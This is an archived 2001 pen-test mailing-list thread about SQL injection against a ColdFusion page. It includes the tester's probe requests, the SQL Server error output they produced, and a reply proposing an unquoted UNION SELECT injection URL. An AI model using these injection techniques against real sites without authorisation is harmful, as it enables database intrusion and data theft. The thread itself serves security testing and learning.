Re: CFM SQL injection

From: Kevin Spett (kspett@spidynamics.com)
Date: 12/18/01


From: "Kevin Spett" <kspett@spidynamics.com>
To: <Chili@SexMagnet.com>, <pen-test@security-focus.com>
Date: Mon, 17 Dec 2001 15:39:29 -0800


    It looks like the query that you're attacking isn't prepending and
appending quotes to your input. The string build probably looks a lil'
sumthin' like this:

Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID =
" & strPageID

    This means that there is no need to use quotes in order to perform a
successful injection. So, try something like this:

http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM
OtherTable WHERE 1=1

    Hopefully this will return an error complaining about an invalid table
name, or at least another error that may give you a better idea of what the
web application is doing with your argument.

Kevin Spett
Archbishop of SQL Injection
SPI Dynamics, Inc.

----- Original Message -----
From: "Charlie Liserne" <Chili@SexMagnet.com>
To: <pen-test@securityfocus.com>
Sent: Saturday, December 15, 2001 2:22 PM
Subject: CFM SQL injection

> Hello guys,
>
> I'm performing a pen-test against a web with Coldfusion installed. I
obtain
> some error information, but I'm not able to do nothing because the server
> never understand the parameters I send.
>
> The correct page is as follows:
> http://www.server.com/page.cfm?page_id=8
>
> My probes are following:
>
> -------------------
> Request: http://www.server.com/page.cfm?page_id=8'
>
> Result:
> Invalid parameter type
> Cannot convert 19' to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier
of
> (CFPARAM), occupying document position (5:1) to (5:61).
> Template: c:\blabla\page.cfm
> Query String: page_id=19'
> ------------------------
>
> So it isn't interpreting the ' and I don't know how to execute commands.
It
> seems that it is not an SQL issue, instead it looks a coldfusion error.
> Another probe follows:
>
> --------------------
> Request: http://www.server.com/page.cfm?page_id=0
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near '='.
> The error occurred while processing an element with a general identifier
of
> (CFQUERY), occupying document position (15:1) to (16:65).
> ------------------
>
> Okay, i get an error from the SQL database. But still don't know how to
> take advantage of it. I don't know the database name and I have very
little
> info about it.
>
> Also, there are two more interesting probes:
> ---------------------------
> Request:http://www.server.com/page.cfm?page_id=3,
>
> Result:
> Invalid parameter type
> Cannot convert 3, to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier
of
> (CFPARAM), occupying document position (5:1) to (5:61).
> ----------------------------
> Request: http://www.server.com/page.cfm?page_id=3,4
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near ','.
> The error occurred while processing an element with a general identifier
of
> (CFQUERY), occupying document position (6:1) to (6:72).
> -------------------------------
>
> Do you know how to exploit this (if it's possible)?
>
> Regards,
> Charlie.
>
>
>
>
> --------------------------------------------------------------------------

--
> This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please
see:
> https://alerts.securityfocus.com/
>
>

---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/